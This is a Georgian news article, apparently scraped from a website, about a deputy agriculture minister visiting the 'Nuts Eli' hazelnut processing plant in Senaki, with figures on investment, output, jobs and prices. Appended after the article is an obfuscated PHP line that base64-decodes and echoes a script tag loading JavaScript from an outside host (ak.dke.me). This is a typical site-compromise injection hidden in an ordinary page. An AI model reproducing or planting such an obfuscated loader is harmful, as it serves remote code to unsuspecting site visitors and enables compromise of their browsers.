celsiusi
ავერსი საქკაბელი
გარემოს დაცვისა და სოფლის მეურნეობის მინისტრის პირველი მოადგილე გიორგი ხანიშვილი, სურსათის ეროვნული სააგენტოს უფროს ზურაბ ჩეკურაშვილთან ერთად სენაკის მუნიციპალიტეტში მდებარე თხილის გადამმუშავებელი საწარმოს „ნათს ელი“ მუშაობის პროცესს გაეცნო.
 
როგორც სამინისტროს პრესსამსახურის ინფორმაციაში წერია, თანამედროვე ტექნოლოგიებით აღჭურვილი საწარმო შეღავათიანი აგროკრედიტის პროგრამის ფარგლებში შეიქმნა. განხორციელებული ინვესტიცია 1,5 მლნ ლარს შეადგენს.
 
ყოველწლიურად, „ნათს ელი“ ადგილობრივი ფერმერებისგან საშუალოდ, 4-5 ათას ტონამდე თხილის იბარებს და ამუშავებს. საწარმო მოიცავს წარმოების სრულ ციკლს, რაც თხილის მაღალი ხარისხის შენარჩუნებას უზრუნველყოფს. საწარმოში 70 ადგილობრივია დასაქმებული.
 
„ბოლო წლებში, სახელმწიფოს სწორი პოლიტიკის, მიმდინარე პროექტებისა და პროგრამების, გადამმუშავებელ და შემნახველ საწარმოებში განხორციელებული ინვესტიციების შედეგად, ქვეყნის მასშტაბით შეიქმნა და ფუნქციონირებს თანამედროვე სტანდარტის, ახალი ტექნოლოგიებით აღჭურვილი საწარმოები, რაც ეხმარება ადგილობრივ ფერმერებს მოწეული მოსავალის დაბინავება-რეალიზებაში. ამავდროულად, წარმოების სრულ ჯაჭვში თანამედროვე ტექნოლოგიების დანერგვა-განვითარება, უზრუნველყოფს მოსავლის ხარისხის შენარჩუნებას და ხელს უწყობს საერთაშორისო ბაზრებზე ქართული თხილის, როგორც ბრენდის დამკვიდრებას. თხილის წარმოების გაუმჯობესების მიზნით, სახელმწიფო მომავალშიც გააგრძელებს ხელშემწყობი ღონისძიებების განხორციელებას“, - აღნიშნა გიორგი ხანიშვილმა.
 
აღსანიშნავია, რომ წელს თხილის საკმაოდ უხვი მოსავალია და ხარისხის შესაბამისად, მისი ფასი 3-6 ლარის ფარგლებში მერყეობს. გადამუშავებული პროდუქციის ძირითადი ნაწილი ექსპორტზე გადის.
1016
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");